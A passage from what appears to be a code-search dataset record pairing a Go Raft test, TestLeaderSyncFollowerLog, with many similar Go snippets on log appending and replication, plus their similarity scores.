string(bytesToStore))\n\tstub.PutState(UFA_TRXN_PREFIX+ufanumber, bytesToStore)\n\tlogger.Info(\"Appending to transaction history \" + ufanumber + \" Done!!\")\n\treturn nil\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tindex := -1\n\tterm := -1\n\tisLeader := true\n\n\t// Your code here (2B).\n\tif rf.state == Leader {\n\t\tnewLogEntry := LogEntry{}\n\t\trf.mu.Lock()\n\t\tif rf.state == Leader {\n\t\t\tterm = rf.currentTerm\n\t\t\tnewLogEntry.Term = term\n\t\t\tnewLogEntry.Command = command\n\t\t\trf.log = append(rf.log, newLogEntry)\n\t\t\tindex = len(rf.log) - 1\n\t\t\t// update leader's matchIndex and nextIndex\n\t\t\trf.matchIndex[rf.me] = index\n\t\t\trf.nextIndex[rf.me] = index + 1\n\t\t\trf.persist()\n\t\t} else {\n\t\t\tDPrintf(\"Peer-%d, before lock, the state has changed to %d.\\n\", rf.me, rf.state)\n\t\t}\n\t\tif term != -1 {\n\t\t\tDPrintf(\"Peer-%d start to append %v to peers.\\n\", rf.me, command)\n\t\t\trequest := rf.createAppendEntriesRequest(index, index+1, term)\n\t\t\tappendProcess := func(server int) bool {\n\t\t\t\treply := new(AppendEntriesReply)\n\t\t\t\trf.sendAppendEntries(server, request, reply)\n\t\t\t\tok := rf.processAppendEntriesReply(index+1, reply)\n\t\t\t\tif ok {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d successfully.\\n\", rf.me, request.Entries, server)\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d failed.\\n\", rf.me, request.Entries, server)\n\t\t\t\t}\n\t\t\t\treturn ok\n\t\t\t}\n\t\t\tgo func() {\n\t\t\t\tok := rf.agreeWithServers(appendProcess)\n\t\t\t\tif ok {\n\t\t\t\t\t// if append successfully, update commit index.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tif index >= rf.commitIndex {\n\t\t\t\t\t\tDPrintf(\"Peer-%d set commit=%d, origin=%d.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t\trf.commitIndex = index\n\t\t\t\t\t} else {\n\t\t\t\t\t\tDPrintf(\"Peer-%d get a currentIndex=%d < commitIndex=%d, it can not be happend.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d start agreement with servers failed. currentIndex=%d.\\n\", rf.me, index)\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t\trf.mu.Unlock()\n\t} else {\n\t\tisLeader = false\n\t}\n\treturn index, term, isLeader\n}", "func (r *Raft) replicateTo(replication *followerReplication, lastIndex uint64) (shouldStop bool) {\n\tvar peer Server\n\tvar req pb.AppendEntriesRequest\n\tvar resp pb.AppendEntriesResponse\n\nStart:\n\t// Prevent an excessive retry rate on errors\n\tif replication.failures > 0 {\n\t\tselect {\n\t\tcase <-time.After(backoff(failureWait, replication.failures, maxFailureScale)):\n\t\tcase <-r.shutdownCh:\n\t\t}\n\t}\n\n\treplication.peerLock.RLock()\n\tpeer = replication.peer\n\treplication.peerLock.RUnlock()\n\n\t// Setup the request\n\tif err := r.setupAppendEntries(replication, &req, atomic.LoadUint64(&replication.nextIndex), lastIndex); err == ErrLogNotFound {\n\t\tgoto SendSnap\n\t} else if err != nil {\n\t\treturn\n\t}\n\n\t// Make the RPC call\n\tif err := r.transport.AppendEntries(peer.ID, peer.Address, &req, &resp); err != nil {\n\t\tklog.Errorf(fmt.Sprintf(\"failed to appendEntries from %s/%s to peer:%s/%s err:%v\",\n\t\t\tr.localID, r.localAddr, peer.ID, peer.Address, err))\n\t\treplication.failures++\n\t\treturn\n\t}\n\n\t// Check for a newer term, stop running\n\tif resp.Term > req.Term {\n\t\tr.handleStaleTerm(replication)\n\t\treturn true\n\t}\n\n\t// Update the last contact\n\treplication.setLastContact()\n\n\t// Update s based on success\n\tif resp.Success {\n\t\t// Update our replication state\n\t\tupdateLastAppended(replication, &req)\n\n\t\t// Clear any failures, allow pipelining\n\t\treplication.failures = 0\n\t\treplication.allowPipeline = true\n\t} else {\n\t\tatomic.StoreUint64(&replication.nextIndex, max(min(replication.nextIndex-1, resp.LastLog+1), 1))\n\t\tif resp.NoRetryBackoff {\n\t\t\treplication.failures = 0\n\t\t} else {\n\t\t\treplication.failures++\n\t\t}\n\t\tklog.Warningf(fmt.Sprintf(\"appendEntries rejected, sending older logs to peer:%s/%s nextIndex:%d\",\n\t\t\tpeer.ID, peer.Address, atomic.LoadUint64(&replication.nextIndex)))\n\t}\n\nCheckMore:\n\t// Poll the stop channel here in case we are looping and have been asked\n\t// to stop, or have stepped down as leader. Even for the best effort case\n\t// where we are asked to replicate to a given index and then shutdown,\n\t// it's better to not loop in here to send lots of entries to a straggler\n\t// that's leaving the cluster anyways.\n\tselect {\n\tcase <-replication.stopCh:\n\t\treturn true\n\tdefault:\n\t}\n\n\t// Check if there are more logs to replicate\n\tif atomic.LoadUint64(&replication.nextIndex) <= lastIndex {\n\t\tgoto Start\n\t}\n\treturn\n\n\t// SEND_SNAP is used when we fail to get a log, usually because the follower\n\t// is too far behind, and we must ship a snapshot down instead\nSendSnap:\n\tif stop, err := r.sendLatestSnapshot(replication); stop {\n\t\treturn true\n\t} else if err != nil {\n\t\tklog.Errorf(fmt.Sprintf(\"failed to send snapshot to peer:%s/%s err:%v\", peer.ID, peer.Address, err))\n\t\treturn\n\t}\n\n\t// Check if there is more to replicate\n\tgoto CheckMore\n}", "func TestAppender_Write(t *testing.T) {\n\tappender := NewTestAppender(\"foobar\")\n\tdefer CloseAppender(t, appender)\n\n\t{\n\t\tbefore := time.Now()\n\t\tentry := soba.NewEntry(\"foobar.module.asm\", soba.WarnLevel, \"Invalid opcode\", []soba.Field{\n\t\t\tsoba.Binary(\"opcode\", []byte{0x67}),\n\t\t\tsoba.String(\"module\", \"bootloader\"),\n\t\t})\n\t\tdefer entry.Flush()\n\t\tafter := time.Now()\n\n\t\tappender.Write(entry)\n\n\t\texpected := fmt.Sprint(\n\t\t\t`{\"logger\":\"foobar.module.asm\",\"level\":\"warning\",`,\n\t\t\t`\"message\":\"Invalid opcode\",\"opcode\":\"Zw==\",\"module\":\"bootloader\"}`,\n\t\t\t\"\\n\",\n\t\t)\n\n\t\tif len(appender.entries) != 1 {\n\t\t\tt.Fatalf(\"Unexpected number of entries: %d should be %d\", len(appender.entries), 1)\n\t\t}\n\t\tif len(appender.times) != len(appender.entries) {\n\t\t\tt.Fatalf(\"Unexpected number of entries timestamp: %d should be %d\",\n\t\t\t\tlen(appender.times), len(appender.entries))\n\t\t}\n\t\tif appender.entries[0] != expected {\n\t\t\tt.Fatalf(\"Unexpected entry #1: '%s' should be '%s'\", appender.entries[0], expected)\n\t\t}\n\t\tif appender.Log(0) != appender.entries[0] {\n\t\t\tt.Fatalf(\"Unexpected entry #1: '%s' should be '%s'\", appender.Log(0), appender.entries[0])\n\t\t}\n\t\tif appender.times[0].Unix() < before.Unix() {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be greater than or equals to %d\",\n\t\t\t\tappender.times[0].Unix(), before.Unix())\n\t\t}\n\t\tif appender.times[0].Unix() > after.Unix() {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be less than or equals to %d\",\n\t\t\t\tappender.times[0].Unix(), after.Unix())\n\t\t}\n\t\tif appender.Time(0) != appender.times[0] {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be equals to %d\",\n\t\t\t\tappender.Time(0).Unix(), appender.times[0].Unix())\n\t\t}\n\t}\n\t{\n\t\tbefore := time.Now()\n\t\tentry := soba.NewEntry(\"foobar.module.asm\", soba.DebugLevel, \"Jump stack\", []soba.Field{\n\t\t\tsoba.Uint64(\"from\", 0x23456F34),\n\t\t\tsoba.Uint64(\"to\", 0x6723F4AB),\n\t\t\tsoba.String(\"module\", \"cryptofs\"),\n\t\t})\n\t\tdefer entry.Flush()\n\t\tafter := time.Now()\n\n\t\tappender.Write(entry)\n\n\t\texpected := fmt.Sprint(\n\t\t\t`{\"logger\":\"foobar.module.asm\",\"level\":\"debug\",`,\n\t\t\t`\"message\":\"Jump stack\",\"from\":591753012,\"to\":1730409643,\"module\":\"cryptofs\"}`,\n\t\t\t\"\\n\",\n\t\t)\n\n\t\tif len(appender.entries) != 2 {\n\t\t\tt.Fatalf(\"Unexpected number of entries: %d should be %d\", len(appender.entries), 2)\n\t\t}\n\t\tif len(appender.times) != len(appender.entries) {\n\t\t\tt.Fatalf(\"Unexpected number of entries timestamp: %d should be %d\",\n\t\t\t\tlen(appender.times), len(appender.entries))\n\t\t}\n\t\tif appender.entries[1] != expected {\n\t\t\tt.Fatalf(\"Unexpected entry #2: '%s' should be '%s'\", appender.entries[1], expected)\n\t\t}\n\t\tif appender.Log(1) != appender.entries[1] {\n\t\t\tt.Fatalf(\"Unexpected entry #1: '%s' should be '%s'\", appender.Log(1), appender.entries[1])\n\t\t}\n\t\tif appender.times[1].Unix() < before.Unix() {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be greater than or equals to %d\",\n\t\t\t\tappender.times[1].Unix(), before.Unix())\n\t\t}\n\t\tif appender.times[1].Unix() > after.Unix() {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be less than or equals to %d\",\n\t\t\t\tappender.times[1].Unix(), after.Unix())\n\t\t}\n\t\tif appender.Time(1) != appender.times[1] {\n\t\t\tt.Fatalf(\"Unexpected entry timestamp: %d should be equals to %d\",\n\t\t\t\tappender.Time(1).Unix(), appender.times[1].Unix())\n\t\t}\n\t}\n}", "func (rbl *RawBytesLog) Append(entry *Entry) error {\n\terr := writeBytesWithLen16(rbl.logFile, entry.Key)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = writeBytesWithLen32(rbl.logFile, entry.Bytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func appendLogEntry(dst []byte, e *LogEntry) []byte {\n\tvar buf [binary.MaxVarintLen64]byte\n\tstart := len(dst)\n\n\t// Append flag.\n\tdst = append(dst, e.Flag)\n\n\t// Append series id.\n\tn := binary.PutUvarint(buf[:], uint64(e.SeriesID))\n\tdst = append(dst, buf[:n]...)\n\n\t// Append name.\n\tn = binary.PutUvarint(buf[:], uint64(len(e.Name)))\n\tdst = append(dst, buf[:n]...)\n\tdst = append(dst, e.Name...)\n\n\t// Append key.\n\tn = binary.PutUvarint(buf[:], uint64(len(e.Key)))\n\tdst = append(dst, buf[:n]...)\n\tdst = append(dst, e.Key...)\n\n\t// Append value.\n\tn = binary.PutUvarint(buf[:], uint64(len(e.Value)))\n\tdst = append(dst, buf[:n]...)\n\tdst = append(dst, e.Value...)\n\n\t// Calculate checksum.\n\te.Checksum = crc32.ChecksumIEEE(dst[start:])\n\n\t// Append checksum.\n\tbinary.BigEndian.PutUint32(buf[:4], e.Checksum)\n\tdst = append(dst, buf[:4]...)\n\n\treturn dst\n}", "func (l *RaftLog) addEntry(term uint64, data []byte) {\n\tnewEntry := pb.Entry{\n\t\tIndex: l.LastIndex() + 1,\n\t\tTerm: term,\n\t\tData: data,\n\t}\n\tl.entries = append(l.entries, newEntry)\n\tl.pendingEntries = append(l.pendingEntries, newEntry)\n}", "func (f *LogFile) appendEntry(e *LogEntry) error {\n\t// Marshal entry to the local buffer.\n\tf.buf = appendLogEntry(f.buf[:0], e)\n\n\t// Save the size of the record.\n\te.Size = len(f.buf)\n\n\t// Write record to file.\n\tn, err := f.w.Write(f.buf)\n\tif err != nil {\n\t\t// Move position backwards over partial entry.\n\t\t// Log should be reopened if seeking cannot be completed.\n\t\tif n > 0 {\n\t\t\tf.w.Reset(f.file)\n\t\t\tif _, err := f.file.Seek(int64(-n), io.SeekCurrent); err != nil {\n\t\t\t\tf.Close()\n\t\t\t}\n\t\t}\n\t\treturn err\n\t}\n\n\t// Update in-memory file size & modification time.\n\tf.size += int64(n)\n\tf.modTime = time.Now()\n\n\treturn nil\n}", "func (s *raftServer) handleAppendEntry(from int, ae *AppendEntry) bool {\n\tacc := false\n\ts.writeToLog(\"Received appendEntry message from \" + strconv.Itoa(from) + \" with term #\" + strconv.Itoa(ae.Term))\n\tif ae.Term >= s.Term() { // AppendEntry with same or larger term\n\t\ts.setTerm(ae.Term)\n\t\ts.setState(FOLLOWER)\n\t\tacc = true\n\t}\n\ts.replyTo(from, &EntryReply{Term: s.Term(), Success: acc})\n\treturn acc\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (l *LevelDB) Append(entries []pb.Entry) error {\n\tbatch := new(leveldb.Batch)\n\tfor _, e := range entries {\n\t\tk := make([]byte, 8)\n\t\tbinary.LittleEndian.PutUint64(k, uint64(e.Index))\n\t\tb, err := proto.Marshal(&e)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tbatch.Put(k, b)\n\t}\n\n\treturn l.db.Write(batch, nil)\n}", "func UpdateFollowers(\n\tctx context.Context,\n\tfollowTarget string,\n\trdb *redis.Client,\n\thelixCl *helix.Client,\n) {\n\tconst batchSize = 100\n\tfmt.Println(\"Update of followers started.\")\n\tdefer fmt.Println(\"Update of followers finished.\")\n\n\t// update the followers set\n\tcursor := \"\"\n\tfor {\n\t\tresp, err := helixCl.GetUsersFollows(&helix.UsersFollowsParams{\n\t\t\tAfter: cursor,\n\t\t\tFirst: batchSize,\n\t\t\tToID: followTarget,\n\t\t})\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Error getting followers\")\n\t\t\tcontinue\n\t\t}\n\n\t\tfor _, f := range resp.Data.Follows {\n\t\t\tj, err := json.Marshal(f)\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Could not marshal follows data for user %s\", f.FromName)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := rdb.HMSet(ctx, f.FromID, j).Err(); err != nil {\n\t\t\t\tlog.Printf(\"Error adding follower '%s' to DB (%s)\", f.FromName, err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\t// bail out if we are on the last page, since we're getting\n\t\t// batches of 100 each loop iteration\n\t\tif len(resp.Data.Follows) < batchSize {\n\t\t\tbreak\n\t\t}\n\t\tcursor = resp.Data.Pagination.Cursor\n\t}\n\n\t// update the users set to mark new followers as followers\n\tallUsers, err := rdb.HVals(ctx, \"users\").Result()\n\tif err != nil {\n\t\tlog.Printf(\"Couldn't get list of users from DB (%s)\", err)\n\t\treturn\n\t}\n\n\tfor _, userStr := range allUsers {\n\t\tvar u user.User\n\t\terr := json.Unmarshal([]byte(userStr), &u)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't unmarshal user (%s)\", err)\n\t\t\tcontinue\n\t\t}\n\t\t// Check Followers bucket to see if this id exists\n\t\tfollower, err := isFollower(ctx, rdb, u.ID)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't figure out if user %s is a follower\", u.ID)\n\t\t\tcontinue\n\t\t}\n\t\tu.IsFollower = follower\n\t\tif err := saveUser(ctx, rdb, &u); err != nil {\n\t\t\tlog.Printf(\"Couldn't save user %v (%s)\", u, err)\n\t\t\tcontinue\n\t\t}\n\t}\n}", "func (rf *Raft) LogUpToDate(lastIndex int, lastTerm int) bool {\n\t// if empty log, check snapshot\n\tif len(rf.log) == 0 {\n\t\treturn (lastTerm > rf.lastIncludedTerm) || (lastTerm == rf.lastIncludedTerm && lastIndex >= rf.lastIncludedIndex)\n\t}\n\tlastEntry := rf.log[len(rf.log)-1]\n\treturn (lastTerm > lastEntry.Term) || (lastTerm == lastEntry.Term && lastIndex >= lastEntry.Index)\n}" ]
[ "0.7225577", "0.7173168", "0.7102185", "0.7074297", "0.6984191", "0.69528997", "0.6949836", "0.69274294", "0.6906517", "0.69037604", "0.687655", "0.6865381", "0.6854907", "0.6832888", "0.6794146", "0.67904896", "0.6753549", "0.67144686", "0.6712799", "0.6691537", "0.6635659", "0.6594877", "0.65630627", "0.6541094", "0.65261275", "0.64819086", "0.64526457", "0.644232", "0.6393472", "0.6393253", "0.6370089", "0.6319489", "0.631082", "0.6285374", "0.62758243", "0.6253284", "0.62407553", "0.62407553", "0.6227608", "0.62264407", "0.622595", "0.6173328", "0.61629266", "0.61378354", "0.60906506", "0.6049862", "0.5983047", "0.5953657", "0.5946152", "0.5939509", "0.5932334", "0.59220606", "0.5872086", "0.585989", "0.5852144", "0.5833041", "0.57843995", "0.5776247", "0.5775023", "0.5772931", "0.5769326", "0.56716937", "0.56635296", "0.56120384", "0.55994403", "0.55869335", "0.55763644", "0.55742437", "0.5564446", "0.5557916", "0.5514961", "0.55101883", "0.5486014", "0.54856795", "0.54723966", "0.5427767", "0.5416907", "0.5381014", "0.53533626", "0.5327515", "0.52965176", "0.52957916", "0.5278475", "0.5263607", "0.52545834", "0.52505124", "0.5238267", "0.5237385", "0.5215452", "0.5204271", "0.5188265", "0.518454", "0.5183212", "0.5163161", "0.5152458", "0.51195174", "0.5118656", "0.50949067", "0.50794464", "0.50530666" ]
0.82861537
0
TestLeaderSyncFollowerLog tests that the leader could bring a follower's log into consistency with its own. Reference: section 5.3, figure 7
func TestLeaderSyncFollowerLog(t *testing.T) { ents := []pb.Entry{ {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 5, Index: 6}, {Term: 5, Index: 7}, {Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, } term := uint64(8) tests := [][]pb.Entry{ { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 5, Index: 6}, {Term: 5, Index: 7}, {Term: 6, Index: 8}, {Term: 6, Index: 9}, }, { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, }, { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 5, Index: 6}, {Term: 5, Index: 7}, {Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11}, }, { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 5, Index: 6}, {Term: 5, Index: 7}, {Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 7, Index: 11}, {Term: 7, Index: 12}, }, { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7}, }, { {}, {Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3}, {Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6}, {Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11}, }, } for i, tt := range tests { leadStorage := NewMemoryStorage() defer leadStorage.Close() leadStorage.Append(ents) lead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage) lead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term}) followerStorage := NewMemoryStorage() defer followerStorage.Close() followerStorage.Append(tt) follower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage) follower.loadState(pb.HardState{Term: term - 1}) // It is necessary to have a three-node cluster. // The second may have more up-to-date log than the first one, so the // first node needs the vote from the third node to become the leader. n := newNetwork(lead, follower, nopStepper) n.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup}) // The election occurs in the term after the one we loaded with // lead.loadState above. n.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1}) n.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}}) if g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != "" { t.Errorf("#%d: log diff:\n%s", i, g) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func TestStartAsFollower(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateFollower)\n\t}\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestLogReplication1(t *testing.T) {\n\n\tack := make(chan bool)\n\n\t//Get leader\n\tleaderId := raft.GetLeaderId()\n\n\t//Append a log entry to leader as client\n\traft.InsertFakeLogEntry(leaderId)\n\n\tleaderLog := raft.GetLogAsString(leaderId)\n\t// log.Println(leaderLog)\n\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack //Wait for 1 second for log replication to happen\n\n\t//Get logs of all others and compare with each\n\tfor i := 0; i < 5; i++ {\n\t\tcheckIfExpected(t, raft.GetLogAsString(i), leaderLog)\n\t}\n\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func TestLogReplication2(t *testing.T) {\n\tack := make(chan bool)\n\n\t//Kill one server\n\traft.KillServer(1)\n\n\t//Append log to server\n\ttime.AfterFunc(1*time.Second, func() {\n\t\t//Get leader\n\t\tleaderId := raft.GetLeaderId()\n\n\t\t//Append a log entry to leader as client\n\t\traft.InsertFakeLogEntry(leaderId)\n\t})\n\n\t//Resurrect old server after enough time for other to move on\n\ttime.AfterFunc(2*time.Second, func() {\n\t\t//Resurrect old server\n\t\traft.ResurrectServer(1)\n\t})\n\n\t//Check log after some time to see if it matches with current leader\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tleaderLog := raft.GetLogAsString(leaderId)\n\t\tserverLog := raft.GetLogAsString(1)\n\n\t\tcheckIfExpected(t, serverLog, leaderLog)\n\n\t\tack <- true\n\t})\n\n\t<-ack\n\n}", "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, 